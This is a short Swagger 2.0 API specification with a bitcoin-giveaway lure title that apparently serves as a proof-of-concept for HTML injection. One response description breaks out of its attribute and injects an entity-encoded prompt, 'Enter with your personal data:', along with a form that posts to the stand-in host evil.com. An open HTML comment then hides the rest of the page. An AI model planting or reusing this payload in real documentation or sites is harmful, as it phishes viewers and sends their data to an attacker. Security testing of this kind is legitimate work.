 
swagger: '2.0'
info:
  title: Get $1000 in Free Bitcoin
  description: |
    Teste
paths:
  /Free Bitcoin (Click Here):
    get:
      responses:
        '200':
          description: No response was specified'"><p>&#x45;&#x6e;&#x74;&#x65;&#x72;&#x20;&#x77;&#x69;&#x74;&#x68;&#x20;&#x79;&#x6f;&#x75;&#x72;&#x20;&#x70;&#x65;&#x72;&#x73;&#x6f;&#x6e;&#x61;&#x6c;&#x20;&#x64;&#x61;&#x74;&#x61;&#x3a;<form action='https://evil.com'><input type='text'><input type='submit' value='Send'><!--
      tags:
        - Free Bitcoin
      operationId: findAccounts
      summary: Finds all accounts
